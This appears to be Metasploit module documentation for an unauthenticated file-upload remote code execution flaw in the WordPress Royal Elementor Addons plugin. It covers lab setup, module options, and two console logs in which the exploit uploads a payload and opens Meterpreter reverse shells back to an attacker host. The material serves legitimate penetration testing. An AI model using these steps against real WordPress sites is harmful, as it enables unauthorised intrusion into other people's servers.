## Vulnerable Application

This Metasploit module exploits a Remote Code Execution vulnerability in WordPress Royal Elementor Addons and Templates
plugin, versions prior to 1.3.79.
The vulnerability is due to an unauthenticated file upload flaw in the plugin.
To replicate a vulnerable environment for testing:

1. Install WordPress.
2. Download and install the Royal Elementor Addons and Templates plugin, ensuring the version is below 1.3.79.
3. Activate Royal Elementor Templates Kit and chose a theme.
4. Verify that the plugin is activated and accessible on the local network.

## Verification Steps

1. Set up a WordPress instance with the Royal Elementor Addons plugin (version < 1.3.79).
2. Launch `msfconsole` in your Metasploit framework.
3. Use the module: `use exploit/multi/http/wp_royal_elementor_addons_rce`.
4. Set `RHOSTS` to the local IP address or hostname of the target.
5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`.
6. Execute the exploit using the `run` or `exploit` command.
7. If the target is vulnerable, the module will execute the specified payload.

## Options

This module offers several options:

### TARGETURI

- **Description**: Base path of the WordPress application.
- **Required**: Yes.
- **Default Value**: `/`.

## Scenarios

### Successful Exploitation Against Local WordPress with Royal Elementor Addons 1.3.78

**Setup**:

- Local WordPress instance with Royal Elementor Addons version 1.3.78.
- Metasploit Framework.

**Steps**:

1. Start `msfconsole`.
2. Load the module:
```
use exploit/multi/http/wp_royal_elementor_addons_rce
```
4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10).
5. Configure other necessary options (TARGETURI, SSL, etc.).
6. Launch the exploit:
```
exploit
```

**Expected Results**:

- The module attempts to retrieve a nonce from the local server.
- It then uploads and executes the payload.
- If successful, control over the local WordPress instance is gained, depending on the payload used.

**Example**:

With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

```
msf6 > search royal

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_royal_elementor_addons_rce  2023-11-23       excellent  Yes    WordPress Royal Elementor Addons RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_royal_elementor_addons_rce

msf6 > use 0
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > options

Module options (exploit/multi/http/wp_royal_elementor_addons_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
                                         oit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      VaXEJJxCKI       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set rhosts chocapikk.lab
rhosts => chocapikk.lab
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set rport 8888
rport => 8888
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.1
[+] Detected Royal Elementor Addons version: 1.3.78
[+] The target appears to be vulnerable.
[*] Attempting to retrieve nonce...
[+] Nonce found in response: "9e10e80ee1"
[*] Sending payload
[+] Payload uploaded successfully
[*] Triggering the payload
[*] Sending stage (3045380 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.3:46556) at 2023-11-28 08:27:43 +0100

meterpreter > sysinfo
Computer     : 172.20.0.3
OS           : Debian 11.8 (Linux 6.4.10-060410-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

With `php/meterpreter/reverse_tcp`:

```
msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > options

Module options (exploit/multi/http/wp_royal_elementor_addons_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     chocapikk.lab    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
                                         oit.html
   RPORT      8888             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_royal_elementor_addons_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] WordPress Version: 6.4.1
[+] Detected Royal Elementor Addons version: 1.3.78
[+] The target appears to be vulnerable.
[*] Attempting to retrieve nonce...
[+] Nonce found in response: "9e10e80ee1"
[*] Sending payload
[+] Payload uploaded successfully
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 172.20.0.3
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.3:40952) at 2023-11-28 08:30:35 +0100

meterpreter > sysinfo
Computer    : 541828095fba
OS          : Linux 541828095fba 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
```
